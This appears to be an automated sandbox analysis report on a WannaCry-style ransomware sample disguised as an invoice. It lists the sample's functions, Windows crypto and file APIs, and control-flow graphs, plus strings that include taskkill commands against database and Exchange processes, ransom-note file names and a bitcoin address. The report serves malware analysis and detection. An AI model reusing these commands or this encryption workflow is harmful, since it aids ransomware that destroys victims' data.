
                                                            Uniqueness Score: -1.00%

                                                            Function 10004370 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ea3eeb4338976af1b49ef32fc0f27f3129d97ac1d5a3798dafd0532e56462bc
                                                            • Instruction ID: 759c0a14362a556fbf2cad353e51d727f5decb9fea83b105da684ea7e7d84043
                                                            • Opcode Fuzzy Hash: 4ea3eeb4338976af1b49ef32fc0f27f3129d97ac1d5a3798dafd0532e56462bc
                                                            • Instruction Fuzzy Hash: 12118E763043159BE700DEA9EC84FABB3D8EBC46A1F01842AFA41C7245DB61E855DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003AC0 Relevance: 4.6, APIs: 3, Instructions: 97encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 10003A80: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,75AA3310,75AA3310,10003D9E,?,75AA3310,00000000), ref: 10003A9D
                                                            • CryptImportKey.ADVAPI32(?,1000D054,00000114,?,?,00000008,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003AF9
                                                              • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BBB
                                                              • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BD0
                                                              • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BE7
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Crypt$ContextDestroy$AcquireImportRelease
                                                            • String ID:
                                                            • API String ID: 3621138593-0
                                                            • Opcode ID: cf7f808b5e395eb40acbcfc562c684f46bddb0717363dabebf02d7c2591c2498
                                                            • Instruction ID: eeddb810c8b0980dadc4d2239f662fd7310c3eb3cb20e166202ef2aa935ebe17
                                                            • Opcode Fuzzy Hash: cf7f808b5e395eb40acbcfc562c684f46bddb0717363dabebf02d7c2591c2498
                                                            • Instruction Fuzzy Hash: 222190763006116BF616EA259C80FAF73DCEB80AD8701C42EFB45D7149EB20EC0583B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004790 Relevance: 4.5, APIs: 3, Instructions: 27sleepthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • time.MSVCRT ref: 100047AA
                                                              • Part of subcall function 10004730: CreateFileA.KERNELBASE(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000,00000000,?,10005A09), ref: 10004749
                                                            • Sleep.KERNELBASE(000003E8), ref: 100047C9
                                                            • ExitThread.KERNEL32 ref: 100047DC
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CreateExitFileSleepThreadtime
                                                            • String ID:
                                                            • API String ID: 2783800087-0
                                                            • Opcode ID: 78c4880712248404ecc2fa0409a3760e6f5b1b32e76aedbac21b59ea9dd33f48
                                                            • Instruction ID: 044671865621f727fe7313d62920a2e240410ece8b56ecd1862d79b3c5d98fe8
                                                            • Opcode Fuzzy Hash: 78c4880712248404ecc2fa0409a3760e6f5b1b32e76aedbac21b59ea9dd33f48
                                                            • Instruction Fuzzy Hash: 98E065B1A043619BF240EB659CC1F1A73E4FB066C1F030116E90DC725CDB25EC118B75
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003BB0 Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BBB
                                                            • CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BD0
                                                            • CryptReleaseContext.ADVAPI32(?,00000000,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BE7
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Crypt$Destroy$ContextRelease
                                                            • String ID:
                                                            • API String ID: 1308222791-0
                                                            • Opcode ID: 4ea7f1e0a1fd2f9fb43590626c22c626a955715fbfba3da651db7abaaf502b5e
                                                            • Instruction ID: f1cc2cf111f110fe811ea6370cd5c313e44567005eb2b288da12d319a42cafb9
                                                            • Opcode Fuzzy Hash: 4ea7f1e0a1fd2f9fb43590626c22c626a955715fbfba3da651db7abaaf502b5e
                                                            • Instruction Fuzzy Hash: B4E0E5706007119BF7609F26D888F1777ECAF447A4F01C81DF49AD7694CBB8E8408B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003A80 Relevance: 1.5, APIs: 1, Instructions: 26encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,75AA3310,75AA3310,10003D9E,?,75AA3310,00000000), ref: 10003A9D
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AcquireContextCrypt
                                                            • String ID:
                                                            • API String ID: 3951991833-0
                                                            • Opcode ID: 1e2b99b261f434a8758b3837a499fa881346a9b5b9ef7b17a4a540f9265623f0
                                                            • Instruction ID: b1332512aa3679c9017294848d65a50e9c060540053565e5952685b00fb9941e
                                                            • Opcode Fuzzy Hash: 1e2b99b261f434a8758b3837a499fa881346a9b5b9ef7b17a4a540f9265623f0
                                                            • Instruction Fuzzy Hash: 18E02B3374013025F350952EFC01BEB974CD7D2AA1F114026FC45E608CC641CC4780E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003C00 Relevance: 1.5, APIs: 1, Instructions: 20encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptDestroyKey.ADVAPI32(?,?,00000000,10003B1E,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003C0F
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CryptDestroy
                                                            • String ID:
                                                            • API String ID: 1712904745-0
                                                            • Opcode ID: d386fcc28a35982a40e03e9a25c01c0b6323731e41e54903f2a0c06f0d45bc19
                                                            • Instruction ID: 216831db427efc8a39eef34e2a2769008fc1dd1c1a321c3d2b98954c70c139aa
                                                            • Opcode Fuzzy Hash: d386fcc28a35982a40e03e9a25c01c0b6323731e41e54903f2a0c06f0d45bc19
                                                            • Instruction Fuzzy Hash: 20E0ECB6600512ABE7149B1AD844E67FBACEF953A0B01892AF918D3215DB70E855CAA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004350 Relevance: 1.5, APIs: 1, Instructions: 11encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptGenKey.ADVAPI32(?,00000001,08000001,?,10003B4D,?,00000008), ref: 10004361
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Crypt
                                                            • String ID:
                                                            • API String ID: 993010335-0
                                                            • Opcode ID: 189f3ff24126c5494ac2e443b09d7a469fabf7adb680102c7679118783c231a7
                                                            • Instruction ID: cc008437c8a41955c005fef3a11886c117b5a20c5dc68c389fd3f57f9cb059c2
                                                            • Opcode Fuzzy Hash: 189f3ff24126c5494ac2e443b09d7a469fabf7adb680102c7679118783c231a7
                                                            • Instruction Fuzzy Hash: 82C08C703A43037FEA208B38CC81E2A3396A780B02F000A08B046C60C8CAB1C8408A10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005AE0 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 223threadsleepsynchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 87 10005ae0-10005b06 88 10005d64 87->88 89 10005b0c-10005b13 call 10004690 87->89 91 10005d66-10005d7d 88->91 89->88 93 10005b19-10005b5f GetModuleFileNameW wcsrchr 89->93 94 10005b70-10005b8c SetCurrentDirectoryW call 10001000 93->94 95 10005b61-10005b6d wcsrchr 93->95 94->88 98 10005b92-10005ba3 call 100012d0 call 10003410 94->98 95->94 98->88 103 10005ba9-10005be7 sprintf * 3 call 10004600 98->103 106 10005d42-10005d5e CreateThread WaitForSingleObject CloseHandle 103->106 107 10005bed-10005bf8 call 10004500 103->107 106->88 107->106 110 10005bfe-10005c15 ??2@YAPAXI@Z 107->110 111 10005c22 110->111 112 10005c17-10005c20 call 10003a10 110->112 113 10005c24-10005c31 111->113 112->113 113->88 115 10005c37-10005c4a call 10003ac0 113->115 115->88 119 10005c50-10005c57 call 100046d0 115->119 122 10005c61-10005c89 DeleteFileA call 10004420 119->122 123 10005c59-10005c5f 119->123 124 10005c8e-10005cb8 call 10003bb0 CreateThread 122->124 123->122 123->124 129 10005cba-10005cbb FindCloseChangeNotification 124->129 130 10005cbd-10005cd5 Sleep CreateThread 124->130 129->130 131 10005cd7-10005cd8 CloseHandle 130->131 132 10005cda-10005d03 Sleep CreateThread Sleep CreateThread 130->132 131->132 133 10005d05-10005d06 FindCloseChangeNotification 132->133 134 10005d08-10005d1f Sleep CreateThread 132->134 133->134 135 10005d21-10005d22 CloseHandle 134->135 136 10005d24-10005d28 Sleep call 100057c0 134->136 135->136 138 10005d2d-10005d2f 136->138 139 10005d31-10005d3b WaitForSingleObject CloseHandle 138->139 140 10005d3d-10005d40 138->140 139->140 140->91
                                                            APIs
                                                              • Part of subcall function 10004690: CreateMutexA.KERNELBASE(00000000,00000001,MsWinZonesCacheCounterMutexA,?,10005B11), ref: 1000469A
                                                              • Part of subcall function 10004690: GetLastError.KERNEL32(?,10005B11), ref: 100046A6
                                                              • Part of subcall function 10004690: CloseHandle.KERNEL32(00000000,?,10005B11), ref: 100046B4
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000103), ref: 10005B45
                                                            • wcsrchr.MSVCRT ref: 10005B58
                                                            • wcsrchr.MSVCRT ref: 10005B68
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 10005B75
                                                            • sprintf.MSVCRT ref: 10005BBA
                                                            • sprintf.MSVCRT ref: 10005BCA
                                                            • sprintf.MSVCRT ref: 10005BDA
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 10005C00
                                                            • DeleteFileA.KERNELBASE(00000000.res,00000000.pky,00000000.eky), ref: 10005C66
                                                            • CreateThread.KERNELBASE(00000000,00000000,10004790,00000000,00000000,00000000), ref: 10005CAE
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,1000DC68,00000008), ref: 10005CBB
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005CC5
                                                            • CreateThread.KERNELBASE(00000000,00000000,100045C0,00000000,00000000,00000000), ref: 10005CD1
                                                            • CloseHandle.KERNEL32(00000000,?,1000DC68,00000008), ref: 10005CD8
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005CDC
                                                            • CreateThread.KERNELBASE(00000000,00000000,10005730,00000000,00000000,00000000), ref: 10005CE8
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005CEE
                                                            • CreateThread.KERNELBASE(00000000,00000000,10005300,00000000,00000000,00000000), ref: 10005CFF
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,1000DC68,00000008), ref: 10005D06
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005D0A
                                                            • CreateThread.KERNELBASE(00000000,00000000,10004990,00000000,00000000,00000000), ref: 10005D1B
                                                            • CloseHandle.KERNEL32(00000000,?,1000DC68,00000008), ref: 10005D22
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005D26
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,1000DC68,00000008), ref: 10005D34
                                                            • CloseHandle.KERNEL32(00000000,?,1000DC68,00000008), ref: 10005D3B
                                                            • CreateThread.KERNEL32(00000000,00000000,10004990,00000000,00000000,00000000), ref: 10005D4C
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10005D57
                                                            • CloseHandle.KERNEL32(00000000), ref: 10005D5E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CloseCreate$Thread$HandleSleep$sprintf$ChangeFileFindNotificationObjectSingleWaitwcsrchr$??2@CurrentDeleteDirectoryErrorLastModuleMutexName
                                                            • String ID: %08X.eky$%08X.pky$%08X.res$00000000.eky$00000000.pky$00000000.res
                                                            • API String ID: 559266157-2804955549
                                                            • Opcode ID: ee5fbc7882673b08fa3466ba53b034e2caa2d0a80666ceeab9f5b650b967e4bc
                                                            • Instruction ID: e4175da2d662a7d129a6a1c994910e1168799e87a5461eb6227fef153a444960
                                                            • Opcode Fuzzy Hash: ee5fbc7882673b08fa3466ba53b034e2caa2d0a80666ceeab9f5b650b967e4bc
                                                            • Instruction Fuzzy Hash: 0051B1B1A00355BBF620EBB49CC9FAF369CEB446C5F010926FA05961C9EF75AC008676
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100057C0 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 227sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 221 100057c0-1000580e call 10001590 call 10001830 226 10005814-10005822 GetFileAttributesA 221->226 227 10005aae-10005ada call 10001680 221->227 228 10005834-1000583a 226->228 229 10005824-1000582f call 100018f0 226->229 232 10005884-100058a5 call 10004cd0 call 10004df0 call 10005480 228->232 233 1000583c-10005881 time call 10004730 sprintf call 10001080 call 10001000 228->233 229->228 232->227 247 100058ab-100058b4 232->247 233->232 248 100058ba-100058d1 InterlockedExchange 247->248 249 100058d3-10005919 call 10001080 * 5 248->249 250 1000591c-10005924 GetLogicalDrives 248->250 249->250 251 10005926 250->251 253 1000592b-1000594e 251->253 255 10005950-10005959 253->255 256 10005997-1000599b 253->256 258 10005991-10005995 255->258 259 1000595b-1000595d 255->259 256->251 261 1000599d-100059cc InterlockedExchange call 10004a40 256->261 258->253 258->256 263 1000596d-10005970 259->263 264 1000595f-10005969 GetDriveTypeW 259->264 271 100059f4-10005a0e time call 10004730 261->271 272 100059ce-100059f1 sprintf call 10001080 261->272 268 10005972-1000597c GetDriveTypeW 263->268 269 1000597e-1000598e call 10005540 263->269 264->258 267 1000596b 264->267 267->269 268->258 268->269 269->258 283 10005a10-10005a33 sprintf call 10001080 271->283 284 10005a36-10005a38 271->284 272->271 283->284 286 10005a93-10005aa5 Sleep 284->286 287 10005a3a-10005a3c call 10005190 284->287 288 100058b6 286->288 289 10005aab-10005aad 286->289 292 10005a41-10005a44 287->292 288->248 289->227 293 10005a49-10005a50 292->293 293->286 294 10005a52-10005a5b 293->294 295 10005a8d-10005a91 294->295 296 10005a5d-10005a82 GetDriveTypeW 294->296 295->286 295->293 296->295 297 10005a84-10005a8a call 10005190 296->297 297->295
                                                            APIs
                                                              • Part of subcall function 10001590: ??2@YAPAXI@Z.MSVCRT ref: 100015FC
                                                            • GetFileAttributesA.KERNELBASE(f.wnry,00000000.pky,10005340,1000DD8C,75AA0F10), ref: 10005819
                                                            • time.MSVCRT ref: 1000583D
                                                            • sprintf.MSVCRT ref: 1000585F
                                                            • InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100058C1
                                                            • GetLogicalDrives.KERNELBASE ref: 1000591C
                                                            • GetDriveTypeW.KERNELBASE(?), ref: 10005964
                                                            • GetDriveTypeW.KERNELBASE(?), ref: 10005977
                                                            • InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100059A4
                                                            • sprintf.MSVCRT ref: 100059DD
                                                            • time.MSVCRT ref: 100059F6
                                                            • sprintf.MSVCRT ref: 10005A1F
                                                            • GetDriveTypeW.KERNEL32(?), ref: 10005A7D
                                                            • Sleep.KERNEL32(0000EA60), ref: 10005A98
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: DriveTypesprintf$ExchangeInterlockedtime$??2@AttributesDrivesFileLogicalSleep
                                                            • String ID: :\$%s co$%s fi$00000000.pky$@WanaDecryptor@.exe$cmd.exe /c start /b %s vs$f.wnry$taskkill.exe /f /im MSExchange*$taskkill.exe /f /im Microsoft.Exchange.*$taskkill.exe /f /im mysqld.exe$taskkill.exe /f /im sqlserver.exe$taskkill.exe /f /im sqlwriter.exe
                                                            • API String ID: 2286268318-429101447
                                                            • Opcode ID: d22a0b3e83f09ed7f1c4d97d18c1f7f3b1ad7b1683a076e5202ebf9cf000a3db
                                                            • Instruction ID: ad20d759d00d317bb7bba8036ca53a4a21ed912866785a7fe56f7d9f5780bade
                                                            • Opcode Fuzzy Hash: d22a0b3e83f09ed7f1c4d97d18c1f7f3b1ad7b1683a076e5202ebf9cf000a3db
                                                            • Instruction Fuzzy Hash: 4771D475A04351ABF320EB64CC81BCF73A4EB847D5F00062AF689962DDEF71A544C7A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100029F0 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 130sleepfilethreadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 300 100029f0-100029fe 301 10002a04 300->301 302 10002b88-10002b89 ExitThread 300->302 303 10002a06-10002a0c 301->303 303->302 304 10002a12-10002a21 Sleep 303->304 304->303 305 10002a23-10002a29 304->305 305->302 306 10002a2f-10002a42 EnterCriticalSection 305->306 307 10002a48 306->307 308 10002b6f-10002b82 LeaveCriticalSection 306->308 309 10002a4e-10002a64 307->309 308->301 308->302 310 10002a66 309->310 311 10002a68-10002a74 wcslen 309->311 310->311 312 10002ae4-10002aed DeleteFileW 311->312 313 10002a76-10002a82 MoveFileExW 311->313 316 10002b0a-10002b26 312->316 317 10002aef-10002b04 GetFileAttributesW SetFileAttributesW MoveFileExW 312->317 314 10002a84-10002a8e GetFileAttributesW 313->314 315 10002aab-10002ae2 swprintf MoveFileExW 313->315 314->315 318 10002a90-10002aa5 GetFileAttributesW SetFileAttributesW MoveFileExW 314->318 315->312 315->316 319 10002b46-10002b69 ??3@YAXPAX@Z 316->319 320 10002b28-10002b2d 316->320 317->316 318->315 319->308 319->309 321 10002b3a-10002b43 ??3@YAXPAX@Z 320->321 322 10002b2f-10002b31 320->322 321->319 322->321 323 10002b33-10002b38 322->323 323->319
                                                            APIs
                                                            • Sleep.KERNELBASE(000003E8,?,?,?,?,100029E9), ref: 10002A17
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,100029E9), ref: 10002A36
                                                            • wcslen.MSVCRT ref: 10002A69
                                                            • MoveFileExW.KERNELBASE(702D6090,?,00000001), ref: 10002A7A
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 10002A85
                                                            • GetFileAttributesW.KERNEL32(?), ref: 10002A91
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 10002A9B
                                                            • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 10002AA5
                                                            • swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 10002ACD
                                                            • MoveFileExW.KERNELBASE(702D6090,?,00000001), ref: 10002ADA
                                                            • DeleteFileW.KERNELBASE(702D6090), ref: 10002AE5
                                                            • GetFileAttributesW.KERNELBASE(702D6090), ref: 10002AF0
                                                            • SetFileAttributesW.KERNELBASE(702D6090,00000000), ref: 10002AFA
                                                            • MoveFileExW.KERNELBASE(702D6090,00000000,00000004), ref: 10002B04
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002B3E
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002B50
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100029E9), ref: 10002B76
                                                            • ExitThread.KERNEL32 ref: 10002B89
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$Move$??3@CriticalSection$DeleteEnterExitLeaveSleepThreadswprintfwcslen
                                                            • String ID: %s\%d%s$.WNCRYT
                                                            • API String ID: 3370902958-2625268679
                                                            • Opcode ID: acff0b947caafd7e7ca16ce53d0c194df956ea1a7df6ca0019b1ec26c677e3a7
                                                            • Instruction ID: 4eadcc60a9fd2c13a81cde3cb6b98b1cf7f5e87c47d95b9730b2c0affcd99018
                                                            • Opcode Fuzzy Hash: acff0b947caafd7e7ca16ce53d0c194df956ea1a7df6ca0019b1ec26c677e3a7
                                                            • Instruction Fuzzy Hash: F1418DB0A00645EFE320DF24CCC8AABB7EDFB493C5B40452DF65A92259DB34A905CF21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004DF0 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 89fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: sprintf$fclose$AttributesFile_ftol_wfopenfopenfreadfwrite
                                                            • String ID: $%d worth of bitcoin$%.1f BTC$12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw$@Please_Read_Me@.txt$@WanaDecryptor@.exe$r.wnry
                                                            • API String ID: 3877625632-348539979
                                                            • Opcode ID: f93b16d99e2d67eca5aaa2646e491e3e251633abd24757ef33fd9aa690c77c84
                                                            • Instruction ID: e660b577af69ff821e56b4899d06e5cea9328265c4e53c1252cafca3024faee2
                                                            • Opcode Fuzzy Hash: f93b16d99e2d67eca5aaa2646e491e3e251633abd24757ef33fd9aa690c77c84
                                                            • Instruction Fuzzy Hash: 3A21A875504651ABF320E764CC84DDF3799FB843D0F010A15FA9492199DB78A9488BB6
                                                            Uniqueness

